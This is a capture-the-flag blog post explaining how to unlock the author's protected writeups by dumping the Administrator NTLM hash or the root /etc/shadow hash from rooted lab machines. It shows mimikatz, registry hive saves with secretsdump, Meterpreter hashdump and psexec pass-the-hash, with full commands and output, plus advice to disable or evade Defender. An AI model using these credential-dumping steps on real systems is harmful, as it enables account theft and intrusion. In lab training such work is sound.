Post

How to Access the Password protected writeups ?

Posted
Preview Image
By Prashant Saini
6 min read

This is a post about that how can you access my password protected writeups

TOC

  1. Windows Machines
    1. Using Mimikatz
    2. Using System Registries
    3. Using Secretdump.py
    4. Using Metasploit HashDump
  2. Linux Machines
  3. Challenges
  4. Fortress

Windows

If the machine you want to access is Windows , You will need the User Administrator NTLM hash of that machine

Suppose you have done a XYZ machine and you have to root it first then you will need the Administrator NTLM hash of the machine XYZ , There are so many ways to do that , i am going to disscus few of them .

1. Mimikatz

This is the most reliable and easy way to get a Administrator user NTLM hash

The First requirement to use the mimikatz properly you should have a nt authority\system shell. And the second requirement is the Windows Defender Doesn’t caught you. So either turn off the Real Time Protection or Evade it

If you have rooted the machine , You would be having a Administrator Shell , And you can use the PrintSpoofer utility to get a system shell Like this

PrintSpoofer - https://github.com/itm4n/PrintSpoofer

Remember to Trun Off the Defender

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

C:\Users\0xPrashant\Desktop>whoami
0xprashant-pc\0xprashant

C:\Users\0xPrashant\Desktop>.\PrintSpoofer32.exe -i -c "powershell"
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Windows PowerShell
Copyright (C) Microsoft Corporation. All rights reserved.

Try the new cross-platform PowerShell https://aka.ms/pscore6

PS C:\WINDOWS\system32> whoami
nt authority\system
PS C:\WINDOWS\system32>

The next step is to get the NTLM hash of user Administrator

Run mimikatz.exe

1

.\mimikatz.exe "privilege::debug" "token::elevate" "lsadump::sam" "exit"

And Somewhere in the output You can see the user Administrator NTLM hash

1
2
3

RID  : 000001f4 (500)
User : Administrator
  Hash NTLM: 5fbc3d5fec8206a30f4b6c474d68ad71

The NTLM hash for user Administrator is 5fbc3d5fec8206a30f4b6c474d68ad71 use this as a password to access the writeup

2. Using System Registries

In this method you do not need to trun off the Real Time Protection , You just need a SYSTEM shell

First copy the registries to the current path

1
2
3
4
5
6
7

PS C:\Users\0xPrashant\Desktop> reg.exe save hklm\sam sam.save
The operation completed successfully.
PS C:\Users\0xPrashant\Desktop> reg.exe save hklm\security security.save
The operation completed successfully.
PS C:\Users\0xPrashant\Desktop> reg.exe save hklm\system system.save
The operation completed successfully.
PS C:\Users\0xPrashant\Desktop>

Now You have to move these files sam.save, system.save , security.save to your Linux attacking box

I will be using Secretdump.py from impacket to extract the hashes from these files

1
2
3
4
5
6
7
8
9
10
11

root at 0xprashant-parrot in /home/prashant/Desktop 
$ secretsdump.py -sam sam.save -security security.save -system system.save LOCAL
Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation

[*] Target system bootKey: 0x8605b55c1e232d273205bfa830118e1f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c474d68ad71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:**********************************:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:**********************************:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:**********************************:::
0xPrashant:1001:aad3b435b51404eeaad3b435b51404ee:**********************************:::

The NTLM hash for user Administrator is 5fbc3d5fec8206a30f4b6c474d68ad71 use this as a password to access the writeup

3. Using Secretdump.py

In this method neither you need to turn off the Real TIme Protection nor need a SYSTEM shell , Just need the password of the user Administrator

You just need secretdump.py from impacket and Administrator passowrd

1
2
3
4
5
6
7
8
9
10
11
12
13
14

root at 0xprashant-parrot in /home/prashant/Desktop 
$ secretsdump.py Administrator:'password_here'@machine_ip                         
Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation

[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x8605b55c1e232d273205bfa830118e1f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c474d68ad71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:**********************************:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:**********************************:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:**********************************:::
0xPrashant:1001:aad3b435b51404eeaad3b435b51404ee:**********************************:::

The NTLM hash for user Administrator is 5fbc3d5fec8206a30f4b6c474d68ad71 use this as a password to access the writeup

4. Using Metasploit HashDump

In this method You will need a meterpreter sessions as nt authority\system and then use the hashdump post module to get hashes of the User Administrator

1
2
3
4
5
6
7
8
9

msf5 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.43.36:4444 
[*] Sending stage (176195 bytes) to 192.168.43.170
[*] Meterpreter session 2 opened (192.168.43.36:4444 -> 192.168.43.170:1030) at 2021-07-27 19:35:50 +0530

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

Now background the session

1
2
3

meterpreter > bg
[*] Backgrounding session 2...
msf5 exploit(multi/handler) >

And now i will be using a post windows module post/windows/gather/hashdump to get the NTLM hash

1
2

msf5 exploit(multi/handler) > use post/windows/gather/hashdump
msf5 post(windows/gather/hashdump) >

Set the session to the session you backgrounded earlier

1
2
3

msf5 post(windows/gather/hashdump) > set session 2
session => 2
msf5 post(windows/gather/hashdump) >

And now run the exploit

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22

msf5 post(windows/gather/hashdump) > run

[*] Obtaining the boot key...
[*] Calculating the hboot key using SYSKEY 8605b55c1e232d273205bfa830118e1f...
[*] Obtaining the user list and keys...
[*] Decrypting user keys...
[*] Dumping password hints...

No users with password hints on this system

[*] Dumping password hashes...


Administrator:500:aad3b435b51404eeaad3b435b51404ee:5fbc3d5fec8206a30f4b6c474d68ad71:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:**********************************:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:**********************************:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:**********************************:::
0xPrashant:1001:aad3b435b51404eeaad3b435b51404ee:**********************************:::


[*] Post module execution completed
msf5 post(windows/gather/hashdump) >

The NTLM hash for user Administrator is 5fbc3d5fec8206a30f4b6c474d68ad71 use this as a password to access the writeup

Now to confirm that your NTLM hash is Right or Wrong use psexec.py to spawn a shell if any samba port is opened

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

root at 0xprashant-parrot in /home/prashant 
$ psexec.py Administrator@machine_ip -hashes :5fbc3d5fec8206a30f4b6c474d68ad71
Impacket v0.9.23.dev1+20201209.133255.ac307704 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 192.168.43.170.....
[*] Found writable share ADMIN$
[*] Uploading file Kfrvcops.exe
[*] Opening SVCManager on 192.168.43.170.....
[*] Creating service uHZo on 192.168.43.170.....
[*] Starting service uHZo.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.19042.1149]
(c) Microsoft Corporation. All rights reserved.

C:\WINDOWS\system32>whoami
nt authority\system

C:\WINDOWS\system32>

If the hash is right you will be spawned with a shell .

Linux

When you pwn a linux machine or you get a shell as root. The root user can read a file called /etc/shadow which contains hashed passwords all the users on the machine

read the file /etc/shadow

1
2
3

root at 0xprashant-parrot in /home/prashant 
$ cat /etc/shadow                   
root:$6$ENX1BUwpwsmOg8RW$9iTErc6NUQo/09eJqj7Cy2sT7lQnL5boM4psc/c1ato/GVwuIJhJbibxToNgXRKsRHOhRyEeHsEOSSeMg8w4a2:18526:0:99999:7:::

The hash here is from first collon : to the its next collon :

1

$6$ENX1BUwpwsmOg8RW$9iTErc6NUQo/09eJqj7Cy2sT7lQnL5boM4psc/c1ato/GVwuIJhJbibxToNgXRKsRHOhRyEeHsEOSSeMg8w4a2

And this is the hash you are going to use as the passowrd to access the writeup

EZPZ :)

Challenges

To access the witeup of the active challenges just submit the FLAG you got after completing the challenge

Like HTB{F1nal_Fl4g} , Use that Flag as the passowrd to access the writeup

Fortress

To access the Fortress Writeup , Use the last flag of the fortress to access the writeup

like there are 10 flags in the fortress , And you got the 10th flag , Use that Flag as the passowrd to access the writeup

This post is licensed under CC BY 4.0 by the author.